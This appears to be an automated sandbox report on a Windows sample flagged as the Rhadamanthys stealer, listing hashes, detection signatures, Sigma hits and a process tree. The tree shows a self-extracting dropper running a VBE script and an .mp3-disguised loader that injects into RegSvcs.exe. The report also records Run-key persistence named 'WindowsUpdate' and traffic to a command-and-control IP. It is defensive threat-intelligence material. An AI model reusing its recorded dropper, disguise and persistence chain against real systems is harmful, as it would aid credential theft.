Windows Analysis Report
ngPebbPhbp.exe

Overview

General Information

Sample name: ngPebbPhbp.exe (renamed because original name is a hash value)
Original sample name: 5f58e87fee021cbaa9ecfae2d5f8709bd0934b2d2d2779a8f24993425fb20350.exe
Analysis ID: 1560167
MD5: fa000351e26e17543f67e3dedc97d37e
SHA1: c59fc4f489ac15d5a1d455abbf0c3c5ad6fcc189
SHA256: 5f58e87fee021cbaa9ecfae2d5f8709bd0934b2d2d2779a8f24993425fb20350
Tags: 77-105-161-194, exe, user-JAMESWT_MHT

Detection

RHADAMANTHYS
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AntiVM autoit script
Yara detected AntiVM3
Yara detected Autoit Injector
Yara detected RHADAMANTHYS Stealer
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
Found API chain indicative of sandbox detection
Injects a PE file into a foreign processes
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses ipconfig to lookup or modify the Windows network settings
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query the security center for anti-virus and firewall products
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Use NTFS Short Name in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic

Classification

  • System is w10x64
  • ngPebbPhbp.exe (PID: 7300 cmdline: "C:\Users\user\Desktop\ngPebbPhbp.exe" MD5: FA000351E26E17543F67E3DEDC97D37E)
    • wscript.exe (PID: 7436 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\rmxb.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 7524 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /release MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ipconfig.exe (PID: 7616 cmdline: ipconfig /release MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
      • cmd.exe (PID: 7552 cmdline: "C:\Windows\System32\cmd.exe" /c qwlvpmrupf.mp3 tnlupe.mp3 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • qwlvpmrupf.mp3 (PID: 7640 cmdline: qwlvpmrupf.mp3 tnlupe.mp3 MD5: 0ADB9B817F1DF7807576C2D7068DD931)
          • RegSvcs.exe (PID: 7940 cmdline: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
            • OpenWith.exe (PID: 7980 cmdline: "C:\Windows\system32\openwith.exe" MD5: 0ED31792A7FFF811883F80047CBCFC91)
      • cmd.exe (PID: 7676 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /renew MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ipconfig.exe (PID: 7724 cmdline: ipconfig /renew MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
  • qwlvpmrupf.mp3.exe (PID: 8072 cmdline: "C:\Users\user\AppData\Roaming\wlnk\QWLVPM~1.EXE" C:\Users\user\AppData\Roaming\wlnk\tnlupe.mp3 MD5: 0ADB9B817F1DF7807576C2D7068DD931)
    • RegSvcs.exe (PID: 8124 cmdline: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • qwlvpmrupf.mp3.exe (PID: 8188 cmdline: "C:\Users\user\AppData\Roaming\wlnk\QWLVPM~1.EXE" C:\Users\user\AppData\Roaming\wlnk\tnlupe.mp3 MD5: 0ADB9B817F1DF7807576C2D7068DD931)
    • RegSvcs.exe (PID: 4960 cmdline: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • qwlvpmrupf.mp3.exe (PID: 4092 cmdline: "C:\Users\user\AppData\Roaming\wlnk\QWLVPM~1.EXE" C:\Users\user\AppData\Roaming\wlnk\tnlupe.mp3 MD5: 0ADB9B817F1DF7807576C2D7068DD931)
    • RegSvcs.exe (PID: 2740 cmdline: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
Name: Rhadamanthys
Description: According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines. At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
Attribution: Sandworm
Blogpost URLs: https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys
No configs have been found
Source | Rule | Description | Author
0000000E.00000002.1935619525.00000000060B0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security
0000000F.00000002.2946403129.0000000005A41000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security
0000000F.00000003.1935175992.00000000059C0000.00000004.00000001.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
00000014.00000002.2208992211.00000000062C3000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security
0000000F.00000003.1961307501.0000000005639000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security
Source | Rule | Description | Author
15.3.OpenWith.exe.59c0000.7.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
15.3.OpenWith.exe.57a0000.6.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security

System Summary

Source: Process started; Author: Jonathan Cheong, oscd.community; Data: Command: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\rmxb.vbe" , ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 7436, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , ProcessId: 7524, ProcessName: cmd.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\rmxb.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\rmxb.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\ngPebbPhbp.exe", ParentImage: C:\Users\user\Desktop\ngPebbPhbp.exe, ParentProcessId: 7300, ParentProcessName: ngPebbPhbp.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\rmxb.vbe" , ProcessId: 7436, ProcessName: wscript.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\rmxb.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\rmxb.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\ngPebbPhbp.exe", ParentImage: C:\Users\user\Desktop\ngPebbPhbp.exe, ParentProcessId: 7300, ParentProcessName: ngPebbPhbp.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\rmxb.vbe" , ProcessId: 7436, ProcessName: wscript.exe
Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\rmxb.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\rmxb.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\ngPebbPhbp.exe", ParentImage: C:\Users\user\Desktop\ngPebbPhbp.exe, ParentProcessId: 7300, ParentProcessName: ngPebbPhbp.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\rmxb.vbe" , ProcessId: 7436, ProcessName: wscript.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Users\user\AppData\Roaming\wlnk\QWLVPM~1.EXE C:\Users\user\AppData\Roaming\wlnk\tnlupe.mp3, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe, ProcessId: 8072, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate
Source: Process started; Author: Max Altgelt (Nextron Systems); Data: Command: qwlvpmrupf.mp3 tnlupe.mp3, CommandLine: qwlvpmrupf.mp3 tnlupe.mp3, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3, NewProcessName: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3, OriginalFileName: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c qwlvpmrupf.mp3 tnlupe.mp3, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7552, ParentProcessName: cmd.exe, ProcessCommandLine: qwlvpmrupf.mp3 tnlupe.mp3, ProcessId: 7640, ProcessName: qwlvpmrupf.mp3
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe", CommandLine: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ParentCommandLine: qwlvpmrupf.mp3 tnlupe.mp3, ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3, ParentProcessId: 7640, ParentProcessName: qwlvpmrupf.mp3, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe", ProcessId: 7940, ProcessName: RegSvcs.exe
Source: Process started; Author: frack113, Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Users\user\AppData\Roaming\wlnk\QWLVPM~1.EXE" C:\Users\user\AppData\Roaming\wlnk\tnlupe.mp3, CommandLine: "C:\Users\user\AppData\Roaming\wlnk\QWLVPM~1.EXE" C:\Users\user\AppData\Roaming\wlnk\tnlupe.mp3, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe, NewProcessName: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe, OriginalFileName: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Users\user\AppData\Roaming\wlnk\QWLVPM~1.EXE" C:\Users\user\AppData\Roaming\wlnk\tnlupe.mp3, ProcessId: 8072, ProcessName: qwlvpmrupf.mp3.exe
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\rmxb.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\rmxb.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\ngPebbPhbp.exe", ParentImage: C:\Users\user\Desktop\ngPebbPhbp.exe, ParentProcessId: 7300, ParentProcessName: ngPebbPhbp.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\rmxb.vbe" , ProcessId: 7436, ProcessName: wscript.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Users\user\AppData\Roaming\wlnk\QWLVPM~1.EXE C:\Users\user\AppData\Roaming\wlnk\tnlupe.mp3, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3, ProcessId: 7640, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate
No Suricata rule has matched

AV Detection

Source: ngPebbPhbp.exe, ReversingLabs: Detection: 55%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 98.3% probability
Source: ngPebbPhbp.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: ngPebbPhbp.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: ngPebbPhbp.exe, 00000000.00000000.1695435766.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp, ngPebbPhbp.exe, 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: wkernel32.pdb source: OpenWith.exe, 0000000F.00000003.1934628698.00000000058C0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1934512366.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb source: OpenWith.exe, 0000000F.00000003.1935175992.00000000059C0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1934921441.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: OpenWith.exe, 0000000F.00000003.1933709794.0000000005990000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1933480930.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: RegSvcs.pdb, source: qwlvpmrupf.mp3, 00000007.00000003.1924745407.000000000113D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000000.1924462508.00000000005C2000.00000002.00000001.01000000.0000000C.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2054601563.000000000182C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2185950312.0000000001A71000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2271006709.0000000001493000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: OpenWith.exe, 0000000F.00000003.1934031698.00000000057A0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1934260975.0000000005940000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: OpenWith.exe, 0000000F.00000003.1933709794.0000000005990000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1933480930.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: OpenWith.exe, 0000000F.00000003.1934031698.00000000057A0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1934260975.0000000005940000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: RegSvcs.pdb source: qwlvpmrupf.mp3, 00000007.00000003.1924745407.000000000113D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000000.1924462508.00000000005C2000.00000002.00000001.01000000.0000000C.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2054601563.000000000182C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2185950312.0000000001A71000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2271006709.0000000001493000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdbUGP source: OpenWith.exe, 0000000F.00000003.1935175992.00000000059C0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1934921441.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdbUGP source: OpenWith.exe, 0000000F.00000003.1934628698.00000000058C0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1934512366.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\ngPebbPhbp.exe, Code function: 0_2_00B0F826 __EH_prolog3_GS,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00B0F826
Source: C:\Users\user\Desktop\ngPebbPhbp.exe, Code function: 0_2_00B21630 __EH_prolog3_GS,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,0_2_00B21630
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3, Code function: 7_2_003DE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,7_2_003DE387
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3, Code function: 7_2_003DD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,7_2_003DD836
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3, Code function: 7_2_003DDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,7_2_003DDB69
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3, Code function: 7_2_003E9F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,7_2_003E9F9F
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3, Code function: 7_2_003EA0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,7_2_003EA0FA
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3, Code function: 7_2_003EA488 FindFirstFileW,Sleep,FindNextFileW,FindClose,7_2_003EA488
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3, Code function: 7_2_003E65F1 FindFirstFileW,FindNextFileW,FindClose,7_2_003E65F1
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3, Code function: 7_2_003E7248 FindFirstFileW,FindClose,7_2_003E7248
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3, Code function: 7_2_003E72E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,7_2_003E72E9
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe, Code function: 16_2_00DFE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,16_2_00DFE387
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe, Code function: 16_2_00DFD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_00DFD836
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe, Code function: 16_2_00DFDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_00DFDB69
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe, Code function: 16_2_00E09F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_00E09F9F
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe, Code function: 16_2_00E0A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_00E0A0FA
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe, Code function: 16_2_00E0A488 FindFirstFileW,Sleep,FindNextFileW,FindClose,16_2_00E0A488
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe, Code function: 16_2_00E065F1 FindFirstFileW,FindNextFileW,FindClose,16_2_00E065F1
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe, Code function: 16_2_00E072E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,16_2_00E072E9
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe, Code function: 16_2_00E07248 FindFirstFileW,FindClose,16_2_00E07248
Source: global traffic, TCP traffic: 192.168.2.4:49736 -> 51.75.171.9:5151
Source: unknown, TCP traffic detected without corresponding DNS query: 51.75.171.9
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 | Code function: 7_2_003ED7A1 InternetReadFile,SetEvent,GetLastError,SetEvent
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
